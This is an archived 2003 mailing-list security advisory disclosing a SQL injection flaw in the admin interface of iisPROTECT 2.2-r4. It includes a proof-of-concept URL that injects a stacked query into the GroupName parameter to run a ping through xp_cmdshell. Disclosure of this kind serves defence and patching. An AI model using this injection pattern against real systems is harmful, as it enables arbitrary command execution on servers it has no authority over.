iisPROTECT SQL injection in admin interface

From: Gyrniff (frohnat_private)
Date: Fri May 23 2003 - 05:15:42 PDT

  • Next message: Chris Robertson: "Outlook Web Access authentication bypass"

    Release Date:	23.05.2003 
    Application:	iisPROTECT v/2.2-r4 (and probably earlier versions) 
    Vendor:		iisPROTECT 
    			#536, 425 Carrall St. 
    			Vancouver, BC, 
    			V6B6E3, Canada 
    			http://www.iisprotect.com/ 
    Category:		SQL injection in admin interface 
    Risk:			Medium-High 
    Impact:		Arbitrary command execution 
    Vendor Status:	First notified 15/04-2003 17:36 (+1) 
    			Fixed 15/04-2003 22:47 (+1)	 
    Author:		Torben 'Gyrniff' Frohn 
    			email: nnat_private  
     
    Intro 
    ==== 
    From vendor site: "iisPROTECT is a high performance user authentication, 
    password protection and member system". 
    iisPROTECT has a webbased admin interface, the interface lacks sanitising on 
    almost every variable. Successfully exploited some of the variables can be 
    used to inject and execute SQL statements. 
    iisPROTECT uses either a MS access file or a MS SQL-server. In the testing 
    environment the MS SQL-server solution is chosen.  
     
     
    Exploit (Proof of Concept) 
    =================== 
    The following URL exploits the "GroupName" variable and uses the stored 
    procedure "xp_cmdshell" to execute the command "ping": 
    http://x.x.x.x/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';-- 
     
    Fix 
    === 
    Vendor has fixed this problem. 
     
    Credits 
    ===== 
    Vulnerability found by Torben Frohn (Gyrniff)
    



    This archive was generated by hypermail 2b30 : Fri May 23 2003 - 08:58:44 PDT